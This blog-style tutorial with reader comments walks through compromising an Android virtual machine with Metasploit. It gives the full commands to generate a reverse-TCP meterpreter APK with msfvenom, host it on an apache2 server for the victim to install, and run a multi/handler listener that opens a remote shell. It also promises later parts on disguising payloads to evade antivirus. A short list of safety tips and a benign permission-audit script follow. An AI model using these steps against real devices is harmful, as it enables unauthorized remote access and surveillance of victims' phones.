Hacking Android Devices Using Metasploit-Framework (Part-1)

With over 3 billion active users (Android Statistics 2024 Report) spanning over 190 countries, it is pretty obvious that Android security is a big concern. In this article I will try my best to cover the basics of Android hacking using the Metasploit Framework and provide a few simple steps on how you can avoid becoming a victim of such cyberattacks. Let's get started!

Requirements-

  • Any preferred Linux system with MSF installed on it (I'll be using a Kali virtual machine).
  • An Android virtual machine (grab yours at https://www.osboxes.org/android-x86/#android-x86-9-0-r2-info). *If you get an error while setting up these machines, feel free to reach out to me personally for guidance.*

Once you have both of our VMs up and running, we can start our hacking process-

Open a terminal in Linux and run the following command-

#ifconfig        

You might receive an output similar to the one below-

[Image: ifconfig command output]

Here, my network interface is eth0 and my IP address is next to the heading 'inet' under eth0- note down this IP address as it will be extremely useful for us later.

Now we need to generate a basic payload which can be delivered to the target device. For this article, I will be using msfvenom to generate the payload, but you can use any tool of your choice (fatrat is another really good tool for payload generation).

Run the following command by replacing the text enclosed within the <angle_brackets> with your own data-

#sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=<your_IP> LPORT=<port_you_want_to_listen_on> -o <any_name>.apk        

This will prompt you to enter the password for the root user. Once done, we will be looking for the following output-

[Image: msfvenom payload generation]

You can change the LPORT to your preferred port OR follow my port number as stated in the above picture.

Once the payload is generated, you can use the "ls" command to view your files.


The following section is for transferring payload to our target system. (if you are using any other way to transfer the payload, feel free to skip this section)

We now need a way to deliver our payload to the target machine. You can explore other ways, but for this demonstration I will be using the apache2 web server, which comes pre-loaded with Kali. To start apache2, run the following command-

#sudo service apache2 start        

The command will not give you any output but we can check whether our server is up or not by opening the browser and searching for our IP address. If we get the following page, the service has successfully been started-

[Image: apache2 web server started]

We will now move our payload to the server so that we can download it on our target device (Android VM).

We can use the following command for the same-

#sudo mv <any_name>.apk /var/www/html/        

You can visit the directory and use the 'ls' command to verify the same.

On our android device we can visit the following link to download our payload- <attacker_IP>/<any_name>.apk

[Image: Download payload on target]

Once downloaded, follow the usual installation process to install the application on the Android device.

[Image: Normal installation]

The actual "gaining access" part

Once you have delivered the payload to the target, we need to set up msfconsole to listen for incoming connections and to gain a shell to execute commands. This can be set up step by step using the following commands-

#sudo msfconsole        

The above command will return the following screen-

[Image: output of #sudo msfconsole]

Here we can execute both system and Metasploit commands by typing them under 'msf6>'.

Run the following commands in the given order separately-

msf6> use exploit/multi/handler

msf6> set payload android/meterpreter/reverse_tcp

msf6> set LHOST <your_IP>

msf6> set LPORT <port_selected_previously>        

The above commands will return the following if successfully executed-

[Image: MSF commands]

Type the following to start execution of the listener on our end-

msf6> run        

Now, metasploit will wait for the target to execute the application (payload) on their end and provide us with the shell session once done. Till then we will have a screen as follows-

[Image: MSF console (before target executes our application)]

Once the target executes our apk file, we will get a session back along with the following screen-

[Image: MSF console (after target executes our application)]

We can notice our "Meterpreter session 1 opened" along with our "msf6>" converted to "meterpreter>" signaling that we have successfully entered the meterpreter shell session.

You can use the "help" command to list all the other commands which you can execute on the target machine-

[Image: Meterpreter "help" command]

We have successfully gained access to our target!


How can we be safe from such attacks?

Unfortunately, you are highly prone to such attacks if-

  • You love downloading APK files from third party providers.
  • You have switched off the play-store application check security feature.
  • You don't have a good anti-virus on your device.
  • You don't take permissions granted to an application seriously.

So, the basic steps to stay secure are obvious by now-

  • Avoid downloading APKs from third party providers. If extremely necessary, use a trusted provider for the same.
  • At all times, ensure that your play-store application check is turned on.
  • Get a reputable anti-virus for your device.
  • Finally, read each and every permission which an application asks for carefully, and stay away from applications which ask for access to resources out of scope of their operations.
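
The install-source and permission checks in the list above can be scripted from a workstation. The following is an added example, not code from the article: it assumes text shaped like the output of `adb shell pm list packages -i -3` and `adb shell dumpsys package <pkg>` (the layout can differ between Android versions), and the package names, sample data, sensitive-permission list and threshold are all constructed for illustration.

```python
import re

TRUSTED_INSTALLERS = {"com.android.vending"}  # Google Play; assumption, extend for a managed store
SENSITIVE = {"android.permission." + p for p in
             "READ_SMS SEND_SMS RECORD_AUDIO CAMERA ACCESS_FINE_LOCATION READ_CONTACTS READ_CALL_LOG".split()}

# Constructed sample of `adb shell pm list packages -i -3` output (not captured from a device).
PM_LIST = """\
package:com.example.notes  installer=com.android.vending
package:com.example.updater  installer=null
package:com.example.wallpaper  installer=com.android.packageinstaller
"""

def sample_dump(*perms):  # constructed excerpt shaped like `adb shell dumpsys package <pkg>`
    body = "".join(f"      android.permission.{p}\n" for p in perms)
    return ("    requested permissions:\n" + body +
            "    install permissions:\n      android.permission.INTERNET: granted=true\n")

DUMPSYS = {
    "com.example.notes": sample_dump("INTERNET", "CAMERA"),
    "com.example.updater": sample_dump("READ_SMS", "RECORD_AUDIO", "READ_CONTACTS"),
    "com.example.wallpaper": sample_dump("SET_WALLPAPER"),
}

def parse_installers(text):
    """Map package -> installer package (None when no installer was recorded)."""
    pairs = re.findall(r"^package:(\S+)\s+installer=(\S+)$", text, re.M)
    return {pkg: (None if inst == "null" else inst) for pkg, inst in pairs}

def requested_permissions(dump):
    """Collect entries listed under the 'requested permissions:' heading only."""
    perms, inside = set(), False
    for line in dump.splitlines():
        s = line.strip()
        if s.endswith(":"):                      # a section heading
            inside = (s == "requested permissions:")
        elif inside and s:
            perms.add(s.split(":")[0])           # drop any ': flag=value' suffix
    return perms

def audit(pm_list, dumps, threshold=3):
    """Return (package, level, sensitive permissions) for apps worth a manual look."""
    findings = []
    for pkg, installer in parse_installers(pm_list).items():
        sideloaded = installer not in TRUSTED_INSTALLERS
        hits = sorted(SENSITIVE & requested_permissions(dumps.get(pkg, "")))
        level = "HIGH" if sideloaded and len(hits) >= threshold else "REVIEW"
        if sideloaded or len(hits) >= threshold:
            findings.append((pkg, level, hits))
    return findings
```

Calling `audit(PM_LIST, DUMPSYS)` on the constructed data rates the app with no recorded installer and three sensitive permissions as HIGH, and the other sideloaded app as REVIEW.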

But wait! "Vishesh! The payload was easy to identify given that it had a suspicious name and application logo."

Well, the ways to make your Android payloads look genuine and escape anti-virus detection are something I will cover later in other parts of the "Hacking Android Devices Using Metasploit-Framework" series. Till then- Stay Safe & Stay Vigilant!

signing off...

ADEBOLA SODEINDE

Masters Degree In Computer And Information Science

3 weeks

Great Content!!


It's crucial for users to understand the potential risks associated with such cyberattacks and take preventive measures to safeguard their devices and personal information


Impressive guide, really breaks down complex concepts. To elevate your engagement, consider applying the A/B/C/D/E/F/G testing method for your content strategy to identify which topics resonate most with your audience, boosting both reach and interaction.

Naresh Mittal

I m a businessman

7 months

Well said
